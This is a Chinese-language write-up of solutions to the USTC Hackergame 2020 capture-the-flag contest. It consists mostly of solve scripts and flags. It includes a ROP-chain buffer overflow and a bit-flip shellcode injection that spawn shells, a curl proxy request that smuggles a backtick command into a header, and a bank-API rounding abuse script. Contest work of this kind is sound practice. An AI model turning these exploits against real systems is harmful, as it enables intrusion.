中国科学技术大学第七届信息安全大赛 —— USTC Hackergame 2020 WriteUp
前言
抽空玩了两天。没过程,只有解题脚本。
当前分数:3250, 总排名:31 / 2410
binary:600 , general:2000 , math:150 , web:500
0x00 Web - 签到
http://202.38.93.111:10000/?number=1
flag{hR6Ku81-HappyHacking2020-a297053b82}
0x01 General - 猫咪问答++
1. Docker,Golang,Plan 9,PHP,GNU,Perl,FireFox,MySQL,PostgreSQL,MariaDB,Apache Tomcat,Xfce
2. [RFC 1149] MTU 256 milligrams
3. https://ftp.lug.ustc.edu.cn/%E6%B4%BB%E5%8A%A8/2019.09.21_SFD/slides/%E9%97%AA%E7%94%B5%E6%BC%94%E8%AE%B2/Teeworlds/teeworlds.pdf
4. http://vr.shouxi360.com/index.php?m=content&c=index&a=show&catid=26&id=pNiHHxiHjPg
5. https://news.ustclug.org/2019/12/hackergame-2019/
12
256
9
9
17098
flag{b4a31f2a_G00G1e_1s_y0ur_fr13nd_eac1f4394c}
0x02 Web - 2048
首页源码提示 static/js/html_actuator.js
http://202.38.93.111:10005/getflxg?my_favorite_fruit=banana
flxg{8G6so5g-FLXG-2510119fa7}
0x03 General - 一闪而过的 Flag
拖到命令行里运行
flag{Are_you_eyes1ght_g00D?_can_you_dIst1nguish_1iI?}
0x04 General - 从零开始的记账工具人
import xlrd, re
def unit(i):
if not len(i): return 0
num = lambda i : ['', '壹', '贰', '叁', '肆', '伍', '陆', '柒', '捌', '玖', '拾'].index(i)
u = re.findall(r'(.*佰)?(.*拾)?(.*)', i)[0]
return num(u[0][:-1].strip('零')) * 100 + num(u[1][:-1].strip('零')) * 10 + num(u[2].strip('零')) + (len(u[0]) == 1) * 100 + (len(u[1]) == 1) * 10
def parse(i):
u = re.findall(r'(.*元)?(.*角)?(.*)', i)[0]
return unit(u[0][:-1]) * 100 + unit(u[1][:-1]) * 10 + unit(u[2][:-1]) * 1
with xlrd.open_workbook('bills.xlsx') as wb: print('%.2f' % (sum([parse(wb.sheets()[0].cell_value(i, 0)) * int(wb.sheets()[0].cell_value(i, 1)) for i in range(1, wb.sheets()[0].nrows)]) / 100))
flag{18051.70}
0x05 General - 超简单的世界模拟器
package main
import (
"bytes"
"fmt"
"math/rand"
"time"
)
// Reference: https://golang.org/doc/play/life.go
type Field struct {
s [][]bool
w, h int
}
func NewField(w, h int) *Field {
s := make([][]bool, h)
for i := range s {
s[i] = make([]bool, w)
}
return &Field{s: s, w: w, h: h}
}
func (f *Field) Set(x, y int, b bool) {
f.s[y][x] = b
}
func (f *Field) Alive(x, y int) bool {
if x < 0 || x >= f.w || y < 0 || y >= f.w {
return false
}
x += f.w
x %= f.w
y += f.h
y %= f.h
return f.s[y][x]
}
func (f *Field) Next(x, y int) bool {
alive := 0
for i := -1; i <= 1; i++ {
for j := -1; j <= 1; j++ {
if (j != 0 || i != 0) && f.Alive(x+i, y+j) {
alive++
}
}
}
return alive == 3 || alive == 2 && f.Alive(x, y)
}
type Life struct {
a, b *Field
w, h int
}
func NewLife(w, h int) *Life {
a := NewField(w, h)
return &Life{
a: a, b: NewField(w, h),
w: w, h: h,
}
}
func (l *Life) Step() {
for y := 0; y < l.h; y++ {
for x := 0; x < l.w; x++ {
l.b.Set(x, y, l.a.Next(x, y))
}
}
l.a, l.b = l.b, l.a
}
func (l *Life) String() string {
var buf bytes.Buffer
for y := 0; y < l.h; y++ {
for x := 0; x < l.w; x++ {
b := byte('0')
if l.a.Alive(x, y) {
b = '1'
}
buf.WriteByte(b)
}
buf.WriteByte('\n')
}
return buf.String()
}
func show(t int64) {
rand.Seed(t)
l := NewLife(15, 15)
for i := 0; i < (15 * 15 / 4); i++ {
l.a.Set(rand.Intn(15), rand.Intn(15), true)
}
fmt.Println(l)
}
func main() {
s := 0
for {
t := time.Now().UnixNano()
rand.Seed(t)
l := NewLife(50, 50)
l.a.Set(45, 5, true)
l.a.Set(46, 5, true)
l.a.Set(45, 6, true)
l.a.Set(46, 6, true)
l.a.Set(45, 25, true)
l.a.Set(46, 25, true)
l.a.Set(45, 26, true)
l.a.Set(46, 26, true)
for i := 0; i < (15 * 15 / 4); i++ {
l.a.Set(rand.Intn(15), rand.Intn(15), true)
}
for i := 0; i < 200; i++ {
l.Step()
}
m := 0
if !l.a.Alive(45, 5) && !l.a.Alive(46, 5) && !l.a.Alive(45, 6) && !l.a.Alive(46, 6) {
m++
}
if !l.a.Alive(45, 25) && !l.a.Alive(46, 25) && !l.a.Alive(45, 26) && !l.a.Alive(46, 26) {
m++
}
if s == 0 {
if m > 0 {
show(t)
s = 1
}
}else{
if m > 1 {
show(t)
break
}
}
}
}
蝴蝶效应
100000000010000
010000100100000
010000000000000
110010000000000
100000000000000
101010000000101
001000010001001
001000010100000
110010001110100
000000011000000
001100000000001
110000010111100
000000000000100
000010010000100
010011000000100
flag{D0_Y0U_l1k3_g4me_0f_l1fe?_d63de68291}
一石二鸟
001001000100000
001000000100000
100000110000100
001000000000000
100000100011000
101010100100001
000000100000100
110000100101101
000110000000010
110000010000110
100000000000010
000000000111100
000000001000100
000100001000100
010000010001011
flag{1s_th3_e55ence_0f_0ur_un1ver5e_ju5t_c0mputat1on?_4e2bf90f25}
0x06 General - 自复读的复读机
反向复读
exec(__import__("base64").b64decode("aW1wb3J0IHN5cywgb3MsIHJlCgpzeW1ib2wgPSBiJ2V4ZWMoX19pbXBvcnRfXygiYmFzZTY0IiknCgptYXBzX2ZpbGUgPSBvcGVuKCIvcHJvYy9zZWxmL21hcHMiLCAncicpCm1lbV9maWxlID0gb3BlbigiL3Byb2Mvc2VsZi9tZW0iLCAncmInKQpmb3IgbGluZSBpbiBtYXBzX2ZpbGUucmVhZGxpbmVzKCk6CiAgICBtID0gcmUubWF0Y2gocicoWzAtOUEtRmEtZl0rKS0oWzAtOUEtRmEtZl0rKSAoWy1yXSknLCBsaW5lKQogICAgaWYgbS5ncm91cCgzKSA9PSAncic6CiAgICAgICAgc3RhcnQgPSBpbnQobS5ncm91cCgxKSwgMTYpCiAgICAgICAgZW5kID0gaW50KG0uZ3JvdXAoMiksIDE2KQogICAgICAgIG1lbV9maWxlLnNlZWsoc3RhcnQpCiAgICAgICAgY2h1bmsgPSBtZW1fZmlsZS5yZWFkKGVuZCAtIHN0YXJ0KQogICAgICAgIGlmIHN5bWJvbCBpbiBjaHVuazoKICAgICAgICAgICAgd2hpbGUgVHJ1ZToKICAgICAgICAgICAgICAgIGlmIGxlbihjaHVuaykgPCAxOgogICAgICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgICAgICBpbmRleCA9IGNodW5rLmZpbmQoc3ltYm9sKQogICAgICAgICAgICAgICAgaWYgaW5kZXggPCAwOgogICAgICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgICAgICBjaHVuayA9IGNodW5rW2luZGV4Ol0KICAgICAgICAgICAgICAgIGNvbnRlbnQgPSBjaHVuay5zcGxpdChiJ1x4MDAnKVswXQogICAgICAgICAgICAgICAgaWYgbGVuKGNvbnRlbnQpID4gbGVuKHN5bWJvbCk6CiAgICAgICAgICAgICAgICAgICAgc3lzLnN0ZG91dC5idWZmZXIud3JpdGUoY29udGVudFs6Oi0xXSkKICAgICAgICAgICAgICAgICAgICBleGl0KCkKICAgICAgICAgICAgICAgIGNodW5rID0gY2h1bmtbbGVuKHN5bWJvbCk6XQo="))
flag{Yes!_Y0U_h4v3_a_r3v3rs3d_Qu1ne_75e6983fa9}
哈希复读
exec(__import__("base64").b64decode("aW1wb3J0IHN5cywgb3MsIHJlLCBoYXNobGliCgpzeW1ib2wgPSBiJ2V4ZWMoX19pbXBvcnRfXygiYmFzZTY0IiknCgptYXBzX2ZpbGUgPSBvcGVuKCIvcHJvYy9zZWxmL21hcHMiLCAncicpCm1lbV9maWxlID0gb3BlbigiL3Byb2Mvc2VsZi9tZW0iLCAncmInKQpmb3IgbGluZSBpbiBtYXBzX2ZpbGUucmVhZGxpbmVzKCk6CiAgICBtID0gcmUubWF0Y2gocicoWzAtOUEtRmEtZl0rKS0oWzAtOUEtRmEtZl0rKSAoWy1yXSknLCBsaW5lKQogICAgaWYgbS5ncm91cCgzKSA9PSAncic6CiAgICAgICAgc3RhcnQgPSBpbnQobS5ncm91cCgxKSwgMTYpCiAgICAgICAgZW5kID0gaW50KG0uZ3JvdXAoMiksIDE2KQogICAgICAgIG1lbV9maWxlLnNlZWsoc3RhcnQpCiAgICAgICAgY2h1bmsgPSBtZW1fZmlsZS5yZWFkKGVuZCAtIHN0YXJ0KQogICAgICAgIGlmIHN5bWJvbCBpbiBjaHVuazoKICAgICAgICAgICAgd2hpbGUgVHJ1ZToKICAgICAgICAgICAgICAgIGlmIGxlbihjaHVuaykgPCAxOgogICAgICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgICAgICBpbmRleCA9IGNodW5rLmZpbmQoc3ltYm9sKQogICAgICAgICAgICAgICAgaWYgaW5kZXggPCAwOgogICAgICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgICAgICBjaHVuayA9IGNodW5rW2luZGV4Ol0KICAgICAgICAgICAgICAgIGNvbnRlbnQgPSBjaHVuay5zcGxpdChiJ1x4MDAnKVswXQogICAgICAgICAgICAgICAgaWYgbGVuKGNvbnRlbnQpID4gbGVuKHN5bWJvbCk6CiAgICAgICAgICAgICAgICAgICAgc3lzLnN0ZG91dC53cml0ZShoYXNobGliLnNoYTI1Nihjb250ZW50KS5oZXhkaWdlc3QoKSkKICAgICAgICAgICAgICAgICAgICBleGl0KCkKICAgICAgICAgICAgICAgIGNodW5rID0gY2h1bmtbbGVuKHN5bWJvbCk6XQo="))
flag{W0W_Y0Ur_c0de_0utputs_1ts_0wn_sha256_40e965f438}
0x07 General - 233 同学的字符串工具
字符串大写工具
for a in range(255):
for b in range(255):
exec('c="\\u'+hex(a)[2:].upper().rjust(2,'0')+hex(b)[2:].upper().rjust(2,'0')+'"')
if c.upper() == 'FL': print(c)
flag
flag{badunic0debadbad_010dc0f407}
编码转换工具
http://string-functions.com/encodingtable.aspx?encoding=65000&decoding=20127
观察规律,对字母进行编码
+AGY-lag
flag{please_visit_www.utf8everywhere.org_6b46279238}
0x08 General - 233 同学的 Docker
flag{Docker_Layers!=PS_Layers_hhh}
0x09 General - 从零开始的 HTTP 链接
mikrotik nat
flag{TCP_P0RT_0_1s_re5erved_BUT_w0rks_5e4ca20ca5}
0x0A General - 超简陋的 OpenGL 小程序
basic_lighting.vs文件里面,main函数第2行插入
if (FragPos.z > 0.2) FragPos = vec3(0.0, 0.0, 0.0);
flag{glGraphicsHappy(233);}
0x0B Binary - 生活在博弈树上
始终热爱大地
依次输入以下内容
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
a1a1
a0a2
a1a0
a2a2
flag{easy_gamE_but_can_u_get_my_shell}
升上天空
from pwn import *
from struct import pack
# The code from `ROPgadget --binary tictactoe --ropchain`
p = ''
p += pack('<Q', 0x0000000000407228) # pop rsi ; ret
p += pack('<Q', 0x00000000004a60e0) # @ .data
p += pack('<Q', 0x000000000043e52c) # pop rax ; ret
p += '/bin//sh'
p += pack('<Q', 0x000000000046d7b1) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000407228) # pop rsi ; ret
p += pack('<Q', 0x00000000004a60e8) # @ .data + 8
p += pack('<Q', 0x0000000000439070) # xor rax, rax ; ret
p += pack('<Q', 0x000000000046d7b1) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x00000000004017b6) # pop rdi ; ret
p += pack('<Q', 0x00000000004a60e0) # @ .data
p += pack('<Q', 0x0000000000407228) # pop rsi ; ret
p += pack('<Q', 0x00000000004a60e8) # @ .data + 8
p += pack('<Q', 0x000000000043dbb5) # pop rdx ; ret
p += pack('<Q', 0x00000000004a60e8) # @ .data + 8
p += pack('<Q', 0x0000000000439070) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000463af0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000402bf4) # syscall
token = '1188:MEYCIQDHSvk18hHArhVzip8vE9H0kU6vTAulErI4CbmXvJObdwIhAK7rousk9unofCb3QtXqXS+3//cYFrcT7vgAu5hp2xyG'
io = remote('202.38.93.111', 10141)
io.sendline(token)
io.sendlineafter('(0,1):', 'a'*(0x90+0x8) + p)
io.sendline('a1a1')
io.sendline('a0a2')
io.sendline('a1a0')
io.sendline('a2a2')
io.interactive()
flag{Get_the_she11_1s_not_so_hard_2571392e56}
0x0C General - 狗狗银行
四舍五入
import requests, json
url = 'http://202.38.93.111:10100'
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer 1188:MEYCIQDHSvk18hHArhVzip8vE9H0kU6vTAulErI4CbmXvJObdwIhAK7rousk9unofCb3QtXqXS+3//cYFrcT7vgAu5hp2xyG'
}
timeout = 5
count = 50
assert count >= 30
requests.post(url + '/api/reset', data=json.dumps({}), headers=headers, timeout=timeout)
requests.post(url + '/api/create', data=json.dumps({"type":"credit"}), headers=headers, timeout=timeout)
requests.post(url + '/api/transfer', data=json.dumps({"src":2,"dst":1,"amount":167*count-1000}), headers=headers, timeout=timeout)
for i in range(count - 1):
requests.post(url + '/api/create', data=json.dumps({"type":"debit"}), headers=headers, timeout=timeout)
requests.post(url + '/api/transfer', data=json.dumps({"src":1,"dst":i+3,"amount":167}), headers=headers, timeout=timeout)
while True:
requests.post(url + '/api/eat', data=json.dumps({"account":2}), headers=headers, timeout=timeout)
for i in range(count + 1):
requests.post(url + '/api/transfer', data=json.dumps({"src":i+1,"dst":2,"amount":1}), headers=headers, timeout=timeout)
flag = json.loads(requests.get(url + '/api/user', headers={'Authorization':headers['Authorization']}, timeout=timeout).text)['flag']
if flag:
print(flag)
break
flag{W0W.So.R1ch.Much.Smart.52f2d579}
0x0D General - 超基础的数理模拟器
from sympy import *
from sympy.parsing.latex import parse_latex
import requests
token = '1188:MEYCIQDHSvk18hHArhVzip8vE9H0kU6vTAulErI4CbmXvJObdwIhAK7rousk9unofCb3QtXqXS+3//cYFrcT7vgAu5hp2xyG'
url = 'http://202.38.93.111:10190'
s = requests.session()
e = 2.71828182845904523536
s.get(url + '/login', params={'token': token}, timeout=2)
def solve():
r = s.get(url, timeout=2)
expr = r.content.split('<p> $')[1].split('$</p>')[0]
expr = expr.replace('\\left', '').replace('\\right', '').replace('\\,', '').replace('e', str(e)).replace('{d x}', '')
integ = parse_latex(expr)
try:
result = float(integ)
except:
return False
s.post(url + '/submit', data={'ans': '%.6f' % result}, timeout=2)
return True
count = 0
while True:
print count
if solve():
count += 1
if count >= 400:
print s.get(url, timeout=2).content
break
flag{S0lid_M4th_Phy_Foundation_4c656e3f18}
0x0E Web - 超安全的代理服务器
找到 Secret
设置系统环境变量SSLKEYLOGFILE,Wireshark抓包使用SSLKEYLOGFILE解密TLS流量,重新打开浏览器访问网站,看到解密后的HTTP/2流量,有PUSH_PROMISE(SERVER PUSH),访问push过来的链接,拿到flag和secret。
flag{d0_n0t_push_me}
入侵管理中心
curl -v -k --proxy-insecure -x 'https://146.56.228.227' --proxy-header 'Secret: '\`curl -k https://146.56.228.227/00ea158a-0bda-45f5-b957-e1e89c489979 | grep -o "[a-f0-9]\\{10\\}"\` -H 'Referer: http://146.56.228.227:8080/' -p http://0.0.0.0:8080/
flag{c0me_1n_t4_my_h0use}
0x0F Binary - 超精准的宇宙射线模拟器
from pwn import *
def flip(addr, bit):
io.sendlineafter('flip?', '%x %d' % (addr, bit))
def write(addr, old, new):
assert len(old) >= len(new)
for i in range(len(new)):
for j in range(8):
old_bit = (ord(old[i]) >> j) & 1
new_bit = (ord(new[i]) >> j) & 1
if old_bit != new_bit:
flip(addr + i, j)
io = remote('202.38.93.111', 10231)
token = '1188:MEYCIQDHSvk18hHArhVzip8vE9H0kU6vTAulErI4CbmXvJObdwIhAK7rousk9unofCb3QtXqXS+3//cYFrcT7vgAu5hp2xyG'
io.sendline(token)
flip(0x401296, 4)
old = '\xB8P@@\x00H=P@@\x00t\x13\xB8\x00\x00\x00\x00H\x85\xC0t\x09\xBFP@@\x00\xFF\xE0f\x90'
new = '\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05'
write(0x401110, old, new)
flip(0x401296, 6)
io.interactive()
flag{B1t_fl1pfl1pfl1pfl1pfl1p_g0tshe11_owo_03d4de46a4}
0x10 Math - 不经意传输
解密消息
令 v = x0,则 m0 = m0_。
flag{U_R_0n_Th3_ha1f_way_0f_succe55_w0rk_h4rder!_b3fbc0785f}
Comments